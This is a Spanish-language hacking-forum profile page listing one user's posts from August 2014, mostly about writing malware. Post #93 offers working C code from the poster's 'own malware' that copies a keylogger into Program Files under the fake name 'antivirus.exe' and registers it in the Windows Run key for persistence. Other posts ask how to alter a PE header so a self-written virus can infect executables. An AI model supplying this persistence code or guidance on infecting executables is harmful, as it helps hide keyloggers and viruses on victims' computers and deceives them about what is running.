Lo siento, pero este no es el sitio mas idoneo para tu pregunta. Podrías dejar tu pregunta en la sección Electronica, aunque no sé si alguien será capaz de responder tu pregunta porque este es un foro de hacking, y no creo que este relacionado con tu tematica. Espero que alguien pueda ayudarte, y trata de publicar tus posts en el sitio en donde van (creo que irían en otro foro).
- Bienvenido a Test Foro de elhacker.net SMF 2.1.
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
#92
Análisis y Diseño de Malware / Re: Añadir keylogger al registro, y envio por email.
21 Agosto 2014, 00:57 AM
Debes aprender más sobre programacion en C. Por lo que veo, solo es cuestion de agregar una llamada a la funcion que inicia con Windows en el cuerpo de la funcion main. Hasta aqui te puedo ayudar. Son errores simples, solo debes conocer el lenguaje C, y en eso no te puedo ayudar.
#93
Análisis y Diseño de Malware / Re: Añadir keylogger al registro, y envio por email.
20 Agosto 2014, 23:51 PM
Yo te puedo dar un fragmento de codigo de mi propio malware que te permita iniciar con Windows. Espero que te sirva, analizalo, y pruebalo para saber si es lo que buscas. Lo he comentado en ingles, para que se vea mas profesional. Deberías aprender ese idioma para poder participar en foros de habla inglesa.
Yo te recomiendo que hagas tu keylogger en C puro, sin usar C++ o Batch. ¿Por que razón? Porque es más eficiente y profesional usar C. Batch no sirve para crear malware de verdad.
Espero que mi codigo te haya sido util. Si alguna cosa, no dudes en venir al foro de nuevo. Aqui estamos para ayudarnos mutuamente.
Código (cpp) [Seleccionar]
#include "windows.h"
///This function copies the malware executable to the system folder
///And after that, create a registry key to start with Windows.
int start_with_windows(){
char execution_dir[MAX_PATH];
char *program_files_variable;
char path_destiny[MAX_PATH];
cout << "Start with windows..." << endl;
///Gets from which directory the program is running
HMODULE current_executable = GetModuleHandle(NULL);
GetModuleFileName(current_executable,execution_dir, sizeof(execution_dir));
///Gets program files directory
program_files_variable = getenv("PROGRAMFILES");
///Copies the program files directory to the destiny path string
strcpy(path_destiny, program_files_variable);
strcat(path_destiny, "\\antivirus.exe");
///Copies the file to the program files folder
CopyFile(execution_dir, path_destiny, false);
///Creates a registry key
HKEY hKey;
///Opens the registry key "run" to start with Windows
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_SET_VALUE,&hKey );
///Set the value of the new key. Put the path of the malware
RegSetValueEx(hKey, "Antivirus Hola",0,REG_SZ,(const unsigned char*) path_destiny,sizeof(path_destiny));
RegCloseKey(hKey);
///Debugging purpouses
//cout << execution_dir << endl;
return 0;
}
Yo te recomiendo que hagas tu keylogger en C puro, sin usar C++ o Batch. ¿Por que razón? Porque es más eficiente y profesional usar C. Batch no sirve para crear malware de verdad.
Espero que mi codigo te haya sido util. Si alguna cosa, no dudes en venir al foro de nuevo. Aqui estamos para ayudarnos mutuamente.
#94
Análisis y Diseño de Malware / Re: ¿Que debo modificar en el PE Header de un exe para infectarlo con virus????
19 Agosto 2014, 17:34 PM
Gracias por sus respuestas
#95
Dudas Generales / Como borrar un post que hice yo?? Me equivoque y lo dupliqué
19 Agosto 2014, 01:24 AM
Hola, escribo este mensaje para preguntarles, ¿Como puedo eliminar un post que hice yo? Lo que ocurre es que mientras escribía un post, de casualidad se envio dos veces, y quisiera borrar el duplicado antes de que algun moderador piense que yo estoy haciendo spam.
No sé porque se envio doble, solo ocurrio. Si pudieran decirme como borrar el post, estaría muy agradecido. Gracias de antemano por sus respuestas.
No sé porque se envio doble, solo ocurrio. Si pudieran decirme como borrar el post, estaría muy agradecido. Gracias de antemano por sus respuestas.
#96
Análisis y Diseño de Malware / ¿Que debo modificar en el PE Header de un exe para infectarlo con virus????
19 Agosto 2014, 01:22 AM
[Disculpen, no sabía que mi post anterior había sido movido aquí, por favor, si pueden respondan a mi pregunta]
Hola, estoy desarrollando un virus sencillo en assembly. Es capaz de buscar archivos .exe en el directorio especificado, pero me falta una parte: ¿Que debo modificar en el PE Header de un exe para infectarlo con mi virus sencillo??? Es lo unico que me falta.
No piensen que estoy haciendo preguntas de lammers, ya que tengo conocimientos sobre algunas cosas sobre las cabeceras de los ejecutables de Windows, pero no sé que debiera modificar exactamente para que mi virus sea añadido al final del ejecutable y corra de primero.
Si pudieran darme una guia sobre que campos de los Headers del Exe debo modificar, estaría muy agradecido. Gracias por sus respuestas de antemano.
Hola, estoy desarrollando un virus sencillo en assembly. Es capaz de buscar archivos .exe en el directorio especificado, pero me falta una parte: ¿Que debo modificar en el PE Header de un exe para infectarlo con mi virus sencillo??? Es lo unico que me falta.
No piensen que estoy haciendo preguntas de lammers, ya que tengo conocimientos sobre algunas cosas sobre las cabeceras de los ejecutables de Windows, pero no sé que debiera modificar exactamente para que mi virus sea añadido al final del ejecutable y corra de primero.
Si pudieran darme una guia sobre que campos de los Headers del Exe debo modificar, estaría muy agradecido. Gracias por sus respuestas de antemano.
#97
Análisis y Diseño de Malware / Re: Que debo modificar en el PE Header de un ejecutable para infectarlo????
19 Agosto 2014, 00:45 AM
Gracias MCKSys Argentina por responderme. Me imagino que moverán el post.
#98
Análisis y Diseño de Malware / Que debo modificar en el PE Header de un ejecutable para infectarlo????
19 Agosto 2014, 00:16 AM
Hola, no sé si esto debería ir en este subforo, pero como vi que decía "Windows", me imagino que será cosas relacionadas a la programacion en Windows. Bueno, mi problema es este: Estoy desarrollando un virus simple. Ya mi virus es capaz de buscar archivos .exe, pero no sé como infectarlos, es decir, sobreescribir el PE header para poder añadir mi virus a él.
Eso es todo lo que me falta para terminar mi malware. Por favor, si pudieran darme una guía detallada sobre que hacer, que modificar y que añadirle al PE header para que mi virus se quede anexado al ejecutable sin dañarlo, estaría muy agradecido.
Gracias de antemano por sus respuestas
Eso es todo lo que me falta para terminar mi malware. Por favor, si pudieran darme una guía detallada sobre que hacer, que modificar y que añadirle al PE header para que mi virus se quede anexado al ejecutable sin dañarlo, estaría muy agradecido.
Gracias de antemano por sus respuestas
#99
ASM / Re: Ayuda con metodo para encontrar la direccion del Kernel y llamar APIs en memoria
17 Agosto 2014, 01:16 AM
Ok, gracias por aclararme que ese no es el kernel, Eternal Idol. Yo solo me refería al kernel32 en donde estan las APIs. El link que me dio daryo es bueno, Gracias a todos por responder
#100
ASM / Re: Ayuda con metodo para encontrar la direccion del Kernel y llamar APIs en memoria
16 Agosto 2014, 22:45 PM
Gracias daryo.